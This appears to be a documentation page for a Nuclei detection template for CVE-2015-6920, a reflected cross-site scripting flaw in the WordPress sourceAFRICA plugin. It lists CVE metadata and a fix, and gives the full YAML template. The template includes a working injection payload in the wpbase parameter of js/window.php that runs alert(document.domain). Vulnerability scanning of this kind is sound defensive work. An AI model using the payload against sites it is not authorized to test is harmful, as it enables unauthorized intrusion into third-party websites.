WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting
ID: CVE-2015-6920
Severity: medium
Author: daffainfo
Tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project
Description
Section titled “Description”WordPress sourceAFRICA plugin version 0.1.3 contains a cross-site scripting vulnerability.
YAML Source
Section titled “YAML Source”id: CVE-2015-6920
info: name: WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting author: daffainfo severity: medium description: WordPress sourceAFRICA plugin version 0.1.3 contains a cross-site scripting vulnerability. remediation: | Upgrade to the latest version of WordPress sourceAFRICA (>=0.1.4) which includes a fix for this vulnerability. reference: - http://packetstormsecurity.com/files/133371/WordPress-sourceAFRICA-0.1.3-Cross-Site-Scripting.html - https://wpvulndb.com/vulnerabilities/8169 - https://nvd.nist.gov/vuln/detail/CVE-2015-6920 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-6920 cwe-id: CWE-79 epss-score: 0.0016 epss-percentile: 0.52637 cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: "sourceafrica_project" product: sourceafrica framework: wordpress tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_projectflow: http(1) && http(2)
http: - raw: - | GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1 Host: {{Hostname}}
matchers: - type: word internal: true words: - 'SourceAfrica' - 'Tags:' condition: and case-insensitive: true
- method: GET path: - "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and matchers: - type: word part: body words: - '"></script><script>alert(document.domain)</script>'
- type: word part: header words: - text/html
- type: status status: - 200# digest: 490a0046304402203a0610500120d75f43439e5967a53eccc03d30487dc95a7efe3c2bbc136f0104022012167d3356d0ff9d3694d28128e47dfa3382dc012afa6ae516aed38ebc1cb0e9:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-6920.yaml"